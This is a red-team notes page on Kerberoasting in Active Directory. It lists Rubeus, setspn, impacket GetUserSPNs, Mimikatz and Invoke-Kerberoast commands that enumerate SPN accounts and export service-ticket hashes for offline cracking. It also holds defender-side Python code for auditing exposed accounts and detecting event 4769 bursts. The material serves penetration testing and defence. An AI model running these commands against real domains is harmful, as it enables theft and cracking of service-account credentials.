Pentesting & Red Teaming Notes

Kerberoasting


Last updated 2 years ago

If an account has an SPN (Service Principal Name) set, we can request a service ticket for it; that ticket is encrypted with the account's password hash, so we can take it away and try to crack it offline.

For Kerberos to work, the clocks of the attacker machine and the target (the domain controller) must be within 5 minutes of each other.

Rubeus

.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap

Getting SPNs

There are many ways to enumerate them.

setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local ecorp/morph3:Password123@10.10.10.21 -dc-ip 10.10.10.21
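From the defender's side, the same enumeration answers which accounts are actually Kerberoasting-exposed. The following is an added example, not code from the original notes: a Python audit over constructed directory records (the account names, SPNs and the exposure/audit functions are this example's assumptions; the msDS-SupportedEncryptionTypes bit values are the real attribute flags). It flags enabled user accounts with an SPN that still allow RC4 or carry an old password, and skips computer and gMSA accounts whose passwords are long, random and rotated automatically.

```python
# Added example (not part of the original notes): defender-side audit of the accounts
# that carry an SPN, the same population that setspn -q */* or GetUserSPNs enumerates.
# Records are constructed inline; in practice they would come from an LDAP query for
# (servicePrincipalName=*). Attribute names follow the AD schema; the scoring is ours.
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Bit flags of the real msDS-SupportedEncryptionTypes attribute.
RC4_HMAC = 0x4
AES128_CTS_HMAC_SHA1 = 0x8
AES256_CTS_HMAC_SHA1 = 0x10


@dataclass
class SpnAccount:
    sam_account_name: str
    spns: list
    object_class: str        # "user", "computer" or "msDS-GroupManagedServiceAccount"
    supported_etypes: int    # 0 = attribute unset; this audit treats that as RC4-capable
    pwd_last_set: datetime
    enabled: bool = True


def exposure(acct, now, max_pwd_age_days=365):
    """List the reasons one account is Kerberoasting-exposed; an empty list is good."""
    findings = []
    if not acct.spns or not acct.enabled:
        return findings                    # no SPN or disabled: no usable service ticket
    if acct.object_class != "user":
        return findings                    # computer / gMSA: 120-char auto-rotated password
    if acct.supported_etypes == 0 or acct.supported_etypes & RC4_HMAC:
        findings.append("rc4-allowed")     # ticket can be requested with etype 23 (fast to crack)
    if now - acct.pwd_last_set > timedelta(days=max_pwd_age_days):
        findings.append("stale-password")  # long-lived password = long cracking window
    return findings


def audit(accounts, now):
    """Map sAMAccountName -> findings for every account that has at least one finding."""
    report = {}
    for acct in accounts:
        found = exposure(acct, now)
        if found:
            report[acct.sam_account_name] = found
    return report


NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)

# Constructed records for the ecorp.local lab domain used in these notes.
SAMPLE_ACCOUNTS = [
    SpnAccount("svc_sql", ["MSSQLSvc/sql01.ecorp.local:1433"], "user",
               0, NOW - timedelta(days=900)),
    SpnAccount("svc_web", ["HTTP/web01.ecorp.local"], "user",
               AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1, NOW - timedelta(days=30)),
    SpnAccount("svc_backup", ["backup/bk01.ecorp.local"], "user",
               RC4_HMAC | AES256_CTS_HMAC_SHA1, NOW - timedelta(days=10)),
    SpnAccount("WEB01$", ["HOST/web01.ecorp.local"], "computer",
               AES256_CTS_HMAC_SHA1, NOW - timedelta(days=5)),
    SpnAccount("gmsa_app$", ["HTTP/app01.ecorp.local"], "msDS-GroupManagedServiceAccount",
               AES256_CTS_HMAC_SHA1, NOW - timedelta(days=3)),
    SpnAccount("svc_old", ["CIFS/old01.ecorp.local"], "user",
               0, NOW - timedelta(days=2000), enabled=False),
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS, NOW).items():
        print(f"{name}: {', '.join(findings)}")
```

The fixes the findings point at are the usual ones: move the service to a gMSA where possible, otherwise set the account to AES-only (msDS-SupportedEncryptionTypes = 0x18) and give it a long random password that is rotated. An account that still allows RC4 yields a ticket hashcat cracks orders of magnitude faster than an AES one.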

Mimikatz

Listing cached tickets

Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

Extracting tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Invoke-Kerberoast

This PowerShell script is always my go-to. It works pretty well.

powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ASCII kerberoast.txt
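Whichever tool above is used, the domain controller sees the same thing: a burst of service-ticket requests (Security event 4769), usually with the RC4 encryption type 0x17, for many distinct SPN accounts from one user in a short window. The following is an added example, not from the original notes: Python detection logic run over constructed, one-line-per-event 4769 samples. The flattened line format, the detect_kerberoasting function, the 5-minute window and the threshold of three services are this example's assumptions; the field names TargetUserName, ServiceName, TicketEncryptionType and IpAddress are those of the real event.

```python
# Added example (not part of the original notes): Kerberoasting detection over
# Security event 4769 records. The records below are constructed and flattened to
# "timestamp key=value ..." lines; real events arrive as XML/EVTX with more fields.
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4769 = """\
2024-05-01T10:00:01 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.10.50
2024-05-01T10:00:02 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.10.50
2024-05-01T10:00:02 TargetUserName=morph3@ECORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.10.50
2024-05-01T10:00:03 TargetUserName=morph3@ECORP.LOCAL ServiceName=WEB01$ TicketEncryptionType=0x17 IpAddress=10.10.10.50
2024-05-01T10:00:03 TargetUserName=morph3@ECORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.10.50
2024-05-01T10:15:00 TargetUserName=alice@ECORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.10.10.77
2024-05-01T10:20:00 TargetUserName=bob@ECORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.10.78
2024-05-01T11:30:00 TargetUserName=bob@ECORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.10.78
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<kv>.*)$")


def parse_events(text):
    """Parse the flattened sample lines into dicts with a datetime under 'ts'."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        fields = dict(kv.split("=", 1) for kv in m.group("kv").split())
        fields["ts"] = datetime.fromisoformat(m.group("ts"))
        events.append(fields)
    return events


def is_roastable_request(ev):
    """True for an RC4 (etype 0x17) service ticket for a non-machine, non-krbtgt SPN."""
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and the TGT service are not Kerberoast targets
    return ev.get("TicketEncryptionType", "").lower() == "0x17"


def rc4_service_requests(events):
    """Low-fidelity signal: every (user, service) pair that pulled an RC4 service ticket.
    Noisy in mixed domains, decisive once the domain is AES-only."""
    return sorted({(ev["TargetUserName"], ev["ServiceName"])
                   for ev in events if is_roastable_request(ev)})


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """High-fidelity signal: users that requested RC4 service tickets for at least
    `threshold` distinct SPN accounts inside any sliding `window`.
    Returns {user: set of services seen in the offending window(s)}."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"]].append((ev["ts"], ev["ServiceName"]))
    alerts = {}
    for user, reqs in by_user.items():
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1  # slide the window forward
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= threshold:
                alerts[user] = alerts.get(user, set()) | services
    return alerts


if __name__ == "__main__":
    evs = parse_events(SAMPLE_4769)
    for user, services in detect_kerberoasting(evs).items():
        print(f"ALERT {user}: RC4 tickets for {sorted(services)}")
```

On the sample, morph3 trips the burst rule (three SPN accounts within two seconds) while bob, who pulled two RC4 tickets over an hour apart, only shows up in the low-fidelity list. Tune the threshold to the domain: a bigger estate with several legitimate RC4 services needs a higher one, and once every service account is AES-only, any 0x17 request for a user SPN is worth an alert on its own.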

https://github.com/GhostPack/Rubeus
https://raw.githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1